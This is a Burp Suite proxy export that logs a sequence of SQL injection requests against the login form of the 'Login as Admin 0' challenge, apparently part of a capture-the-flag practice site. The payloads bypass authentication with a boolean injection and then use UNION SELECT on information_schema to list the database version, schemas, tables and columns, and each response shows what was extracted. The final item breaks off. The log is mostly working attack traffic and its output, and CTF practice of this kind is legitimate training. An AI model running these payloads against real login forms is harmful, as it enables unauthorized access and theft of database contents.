<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Tue Jan 01 15:29:26 CST 2019">
  <item>
    <time>Tue Jan 01 14:33:32 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 43
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' or `is_admin`=true;--]]></request>
    <status>200</status>
    <responselength>1478</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:33:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1281

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, admin</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 14:35:39 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 45
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' union select 1,2,3,4;--]]></request>
    <status>200</status>
    <responselength>1474</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:35:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1277

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, 2</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 14:36:21 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 53
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' union select 1,version(),3,4;--]]></request>
    <status>200</status>
    <responselength>1496</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:36:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1299

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, 5.7.24-0ubuntu0.18.04.1</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 14:37:55 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 98
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' union select 1,schema_name,3,4 FROM information_schema.schemata limit 0,1;--]]></request>
    <status>200</status>
    <responselength>1491</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:37:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1294

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, information_schema</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 14:38:07 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 98
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' union select 1,schema_name,3,4 FROM information_schema.schemata limit 1,1;--]]></request>
    <status>200</status>
    <responselength>1488</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:38:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1291

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, login_as_admin0</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 14:38:17 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 98
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' union select 1,schema_name,3,4 FROM information_schema.schemata limit 2,1;--]]></request>
    <status>200</status>
    <responselength>2370</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:38:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 2173

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <!-- debug: SELECT * FROM `user` WHERE `user` = 'null' AND `password` = '\\' union select 1,schema_name,3,4 FROM information_schema.schemata limit 2,1;--' -->
            <div class="alert alert-danger">Login failed</div>
            <form action="." method="POST">
                <div class="form-group">
                    <label for="name">User:</label>
                    <input id="name" class="form-control" type="text" name="name" placeholder="User">
                </div>
                <div class="form-group">
                    <label for="password">Pass:</label>
                    <input id="password" class="form-control" type="text" name="password" placeholder="Password">
                </div>
                <div class="form-group">
                    <input class="form-control btn btn-primary" type="submit" value="Login">
                </div>
            </form>

            <div>
                <p>
                    You can login with <code>guest</code> / <code>guest</code>.
                </p>
            </div>
        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 14:47:54 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 132
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' UNION select 1,table_name,3,4 from information_schema.tables where table_schema="login_as_admin0" limit 0,1;--]]></request>
    <status>200</status>
    <responselength>1484</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:47:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1287

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, h1dden_f14g</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 14:48:06 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 132
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' UNION select 1,table_name,3,4 from information_schema.tables where table_schema="login_as_admin0" limit 1,1;--]]></request>
    <status>200</status>
    <responselength>1477</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:48:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1280

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, user</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 14:48:17 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 132
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' UNION select 1,table_name,3,4 from information_schema.tables where table_schema="login_as_admin0" limit 2,1;--]]></request>
    <status>200</status>
    <responselength>2404</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 06:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 2207

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <!-- debug: SELECT * FROM `user` WHERE `user` = 'null' AND `password` = '\\' UNION select 1,table_name,3,4 from information_schema.tables where table_schema="login_as_admin0" limit 2,1;--' -->
            <div class="alert alert-danger">Login failed</div>
            <form action="." method="POST">
                <div class="form-group">
                    <label for="name">User:</label>
                    <input id="name" class="form-control" type="text" name="name" placeholder="User">
                </div>
                <div class="form-group">
                    <label for="password">Pass:</label>
                    <input id="password" class="form-control" type="text" name="password" placeholder="Password">
                </div>
                <div class="form-group">
                    <input class="form-control btn btn-primary" type="submit" value="Login">
                </div>
            </form>

            <div>
                <p>
                    You can login with <code>guest</code> / <code>guest</code>.
                </p>
            </div>
        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 15:18:19 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 163
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' UNION select 1,column_name,3,4 from information_schema.columns where table_schema="login_as_admin0" and table_name="h1dden_f14g" limit 0,1;--]]></request>
    <status>200</status>
    <responselength>1481</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 07:18:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 1284

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <h3>Hi, the_f14g</h3>

            <h4>You are admin!</h4>

            <code>FLAG{\' UNION SELECT &quot;I Know SQL Injection&quot; #}</code>, flag2 in the database!        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 15:18:31 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /login0/ HTTP/1.1
Host: hackme.inndy.tw
Connection: close
Content-Length: 163
Cache-Control: max-age=0
Origin: https://hackme.inndy.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://hackme.inndy.tw/login0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7

name=null&password=\' UNION select 1,column_name,3,4 from information_schema.columns where table_schema="login_as_admin0" and table_name="h1dden_f14g" limit 1,1;--]]></request>
    <status>200</status>
    <responselength>2435</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jan 2019 07:18:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Strict-Transport-Security: max-age=15768000
Content-Length: 2238

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <!-- debug: SELECT * FROM `user` WHERE `user` = 'null' AND `password` = '\\' UNION select 1,column_name,3,4 from information_schema.columns where table_schema="login_as_admin0" and table_name="h1dden_f14g" limit 1,1;--' -->
            <div class="alert alert-danger">Login failed</div>
            <form action="." method="POST">
                <div class="form-group">
                    <label for="name">User:</label>
                    <input id="name" class="form-control" type="text" name="name" placeholder="User">
                </div>
                <div class="form-group">
                    <label for="password">Pass:</label>
                    <input id="password" class="form-control" type="text" name="password" placeholder="Password">
                </div>
                <div class="form-group">
                    <input class="form-control btn btn-primary" type="submit" value="Login">
                </div>
            </form>

            <div>
                <p>
                    You can login with <code>guest</code> / <code>guest</code>.
                </p>
            </div>
        </div>
    </div>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Jan 01 15:27:38 CST 2019</time>
    <url><![CDATA[https://hackme.inndy.tw/login0/]]></url>
    <host ip="140.118.126.236">hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/login0/]]></path>
    <extension>null</extension>
